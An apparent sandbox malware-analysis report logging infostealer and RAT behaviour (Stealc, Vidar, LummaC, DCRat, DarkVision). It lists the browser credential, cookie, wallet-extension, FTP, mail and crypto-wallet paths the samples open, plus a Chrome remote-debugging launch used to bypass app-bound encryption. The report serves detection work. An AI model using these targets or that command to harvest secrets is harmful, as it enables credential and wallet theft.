Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Documents\DBFIEHDHII.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY

Source: Yara match	File source: 00000022.00000003.2847457804.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2957653821.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2728825814.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 60c1233683.exe PID: 8128, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected DCRat

Source: Yara match	File source: 16.2.wTMEVe8.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.wVBhC3KCkV.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wTMEVe8.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wTMEVe8.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2454433505.00000000007F2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2958021104.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wTMEVe8.exe PID: 1836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wVBhC3KCkV.exe PID: 3684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe PID: 3060, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Package Cache\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, type: DROPPED

Yara detected DarkVision Rat

Source: Yara match	File source: 28.2.powershell.exe.60b0328.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60324f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.downloaded_file.exe.11fffa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.explorer.exe.2dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60324f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60b0328.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.2763632421.0000000001200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2956530663.0000000002E08000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2768909710.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.2762140149.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2770761069.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: downloaded_file.exe PID: 7708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 60c1233683.exe PID: 8128, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000023.00000002.2874624996.00000000003E1000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2780250709.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2113309307.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114430584.000000000176E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1668555153.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 50c9f14fb7.exe PID: 7704, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7396, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670C40 sqlite3_bind_zeroblob,	0_2_6C670C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670D60 sqlite3_bind_parameter_name,	0_2_6C670D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C598EA0 sqlite3_clear_bindings,	0_2_6C598EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C670B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596410 bind,WSAGetLastError,	0_2_6C596410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C59C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596070 PR_Listen,	0_2_6C596070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59C030 sqlite3_bind_parameter_count,	0_2_6C59C030
